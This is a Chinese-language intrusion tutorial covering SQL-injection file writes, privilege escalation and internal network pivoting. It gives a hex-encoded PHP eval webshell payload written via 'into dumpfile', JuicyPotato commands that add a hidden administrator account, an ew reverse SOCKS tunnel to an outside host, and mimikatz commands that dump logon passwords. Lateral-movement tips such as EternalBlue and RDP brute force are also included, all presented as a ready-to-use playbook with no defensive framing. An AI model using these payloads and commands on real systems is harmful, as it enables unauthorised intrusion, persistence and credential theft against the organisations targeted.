内網滲透

我們首先先講一下，如何去利用sql注入漏洞

先講兩個導出檔案的函數

into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//寫檔案的一個函數，後面接路徑
into outfile 'C:\\phpstudy\\WWW\\123.txt'//寫檔案的一個函數，後面接路徑
           

但是一般都用不了這兩個函數，他和loadfile()一起的，如果能用loadfile() ,那代表這兩個函數也能用

原因是：mysql.ini的配置問題，要手動添加一個配置

select 1,2,3 into dumpfile 'C:\\Users\\Public\\Music\\WWW\\1.txt'
           

成功生成這1.txt檔案

url編碼就是16進制

比如

可以利用上述函數，在url欄，或者burp中，把這個一句話木馬寫入

!!記住，需要前面加一個0x

select 1,2,0x3c3f706870206576616c28245f524551554553545b385d293f3e into dumpfile 'C:\\Users\\Public\\Music\\WWW\\1.txt'//記住要寫兩個\\，或者記住要用這個斜杠/
           

提權

首先：

介紹幾條有用的cmd指令：

whoami 檢視目前使用者權限
netstat -ano   檢視本機開放的端口
tasklist 檢視本機運作的程式[類似于任務管理器]
systeminfo 檢視計算機資訊
           

常見的手法是利用windows的漏洞：

檢視windows打了什麼更新檔，然後對應去找以下提權工具

提權輔助頁面： https://bugs.hacking8.com/tiquan/

檢視到的更新檔号填入，然後點選查詢就可以，然後告訴你哪些漏洞可以用，直接去找這個微軟編号的利用工具

這裡分享一個，我喜歡用的工具叫做爛洋芋。juicypotato，關于其中的原理我就不分析了，因為提權工具有各種各樣的，而且Windows作業系統的漏洞，如果不是專門研究的，其實不容易分析講解

下載下傳位址：https://github.com/ohpe/juicy-potato/releases

一般來說Github上面的更新檔，會給源碼的就不太會有後門。

這個東西百分百報毒，建議虛拟機下載下傳或者是加個信任之類的。[直接怎麼免殺，暫時就不考慮]

原版的比較複雜指令，需要寫複雜指令：

JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
           

裡面又是涉及很多東西，而且運作了的cmd，還是出現在管理者界面，去操作特别麻煩，是以我給大家提供魔改版的爛洋芋，一條指令就可以了。

JuicyPotato.exe -p "whomai"//""裡面輸入你想要去執行的指令
           

下面是詳細的提權過程

**1.**直接利用菜刀，拿下權限後，進入虛拟終端，輸入這兩個指令

JuicyPotato.exe -p "net user nf 密碼 /add"//建立使用者名
JuicyPotato.exe -p "net localgroup administrators nf /add"//将使用者添加到管理者組權限
           

然後他就添加成功了，成功擷取了管理者權限

**2.**然後我們打開遠端桌面，嘗試進行3389連接配接

發現和我們這台的網站主機不一樣，我們測試的時候，是2008r2的伺服器，但是連3389的時候，卻是2003r2的伺服器

這是因為一個公網ip記憶體在N多台機器

如何去通路内網端口呢？隻能通過端口轉發、映射

*

一個網站一般在目标的内網内，然後他開放的端口，是依靠路由器轉發出去的，使用者通路公網ip的一個端口->然後路由器接受到有人通路了這個端口，根據轉發規則配置設定到内網機器=>内網機器連接配接

*

我們一般用 netstat -ano 看到的是内網端口

但是如果轉發規則裡面不轉發，我們怎麼也通路不到，而且黑路由器也比較難

**是以我們一般會反向連接配接，來連接配接我們公網上的一個端口，然後構成連接配接

**

這裡如果有公網ip就不說了，直接全端口映射，是以我們主要講沒公網ip的情況，這裡給大家介紹一款白嫖工具

https://qydev.com/index.html

利用花生殼去擷取公網ip

然後他會開放一個公網ip的端口，來對應我們本地的一個端口

這樣我們就擷取到了公網ip

3.

當我們擷取了公網ip後，我們可以利用一款工具ew，這是最正統的端口轉發、内網穿透

最常用的指令：

建立反向代理 ew -s rssocks -d 1.1.1.1 -e 8888  将自己反向連接配接到 1.1.1.1的8888端口
JuicyPotato.exe -p "ew -s rssocks -d 1.1.1.1 -e 8888"//利用爛洋芋工具進行提權，通路指令
接受代理，ew -s rcsocks -l 1080 -e 8888  監聽8888端口，将擷取的資料轉發到1080端口
           

當我們連接配接成功過後，就直接利用Proxifier這個工具

我們進入這個工具

改一個配置就可以了

端口是我們之前監聽的那個端口，配置完成，我們就可以直接連接配接内網啦，可以登陸内網機器的3389了

當我們成功進入内網的時候，我們首先需要做的一件事就是資訊收集啦

1. 我們可以進行端口掃描，上傳一個nmap

   然後開始翻一翻本機裡面的檔案，看看有沒有有用的東西

   然後根據端口去尋找問題

2. 例如我們現在想對10.0.1.5測試，很明顯他開了這些端口，就針對這些端口測試。

3. 例如這裡有開放了445端口，445有個内網大殺器永恒之藍

   開了3389，3389可以嘗試爆破登陸，或者打windows rdp漏洞，直接拿下。

   如果有WEB就走WEB測試的道路。

4. 内網很多情況是這樣的，内網很多機器，但是管理者可能就是那麼幾個人，是以各個機器的使用者賬号密碼相同的可能性極高，那麼我們如果能擷取本機所有使用者的密碼，就可以看到管理者原本設定的密碼。

最後講一個工具猕猴桃mimikatz

兩條指令

windows2012/2016不能抓

privilege::debug //提升權限
sekurlsa::logonpasswords //從記憶體中抓取密碼
log//将抓取的資料儲存到桌面的檔案裡